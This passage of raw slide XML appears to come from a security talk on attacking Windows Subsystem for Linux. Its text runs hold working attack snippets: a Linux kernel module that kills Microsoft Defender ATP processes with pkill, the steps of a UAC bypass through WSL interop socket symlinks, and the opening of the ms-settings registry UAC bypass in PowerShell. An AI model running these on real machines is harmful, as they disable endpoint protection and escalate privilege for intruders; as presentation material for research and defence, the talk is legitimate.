          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="270" name="Google Shape;270;p36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680700" y="3527525"/>
            <a:ext cx="0" cy="575700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="271" name="Google Shape;271;p36" title="Screenshot 2025-06-10 at 13.48.41.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3521472" y="1647525"/>
            <a:ext cx="5310829" cy="1683900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Google Shape;272;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476663" y="1101775"/>
            <a:ext cx="516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800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>Defender processes</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains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Bypass Windows Defender plugin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;278;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3177900" y="1938325"/>
            <a:ext cx="5654400" cy="29553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l" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>static</a:t>
            </a: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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> __init </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>entrypoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>)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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>"/bin/pkill"</a:t>
            </a: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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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{path, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>"-9"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>"-f"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>"microsoft"</a:t>
            </a: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NULL</a:t>
            </a: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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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NULL</a:t>
            </a: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200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>call_usermodehelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>(path, argv, envp, UMH_WAIT_PROC);</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200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>printk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>(KERN_INFO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>"Sucessfuly killed ATP processes!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>"</a:t>
            </a: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200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>0</a:t>
            </a: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200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a: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200">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> __exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>exitpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>)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sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>module_init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>(entrypoint);</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>module_exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>(exitpoint);</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="279" name="Google Shape;279;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="179300" y="1412075"/>
            <a:ext cx="2873100" cy="2873100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Google Shape;280;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3177900" y="1305425"/>
            <a:ext cx="5654400" cy="4617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800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>pkill -9 -f microsoft </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>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8" title="defender_bypass.mp4">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="849925" y="152400"/>
            <a:ext cx="7444157" cy="4838702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="2857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UAC bypass via interop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1289100"/>
            <a:ext cx="2847900" cy="6156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1. Execute UAC bypass using interop</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Google Shape;292;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2282388"/>
            <a:ext cx="2847900" cy="6156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2. Run wsl.exe -e dbus-launch true</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Google Shape;293;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3501275"/>
            <a:ext cx="2847900" cy="831300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">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4. Switch to the elevated socket using symlink</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="294" name="Google Shape;294;p39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680700" y="1904700"/>
            <a:ext cx="0" cy="377700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="295" name="Google Shape;295;p39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680700" y="2844600"/>
            <a:ext cx="0" cy="575700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;296;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378675" y="1728300"/>
            <a:ext cx="5187900" cy="400200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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l">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>ln -sf /run/WSL/36_interop /run/WSL/8_interop</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="297" name="Google Shape;297;p39" title="Screenshot 2025-06-09 at 19.02.41.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378675" y="2556203"/>
            <a:ext cx="5561999" cy="1152485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Google Shape;298;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6380100" y="3520850"/>
            <a:ext cx="2508900" cy="18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UAC bypass via interop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Google Shape;304;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389150" y="1806525"/>
            <a:ext cx="8138400" cy="21240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New-Item</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"HKCU:\software\classes\ms-settings\shell\open\command"</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Force;</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New-ItemProperty</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"HKCU:\software\classes\ms-settings\shell\open\command"</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Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>"DelegateExecute"</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Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>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Force;</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pl">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>Set-ItemProperty</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"HKCU:\software\classes\ms-settings\shell\open\command"</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Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>"(default)"</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Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
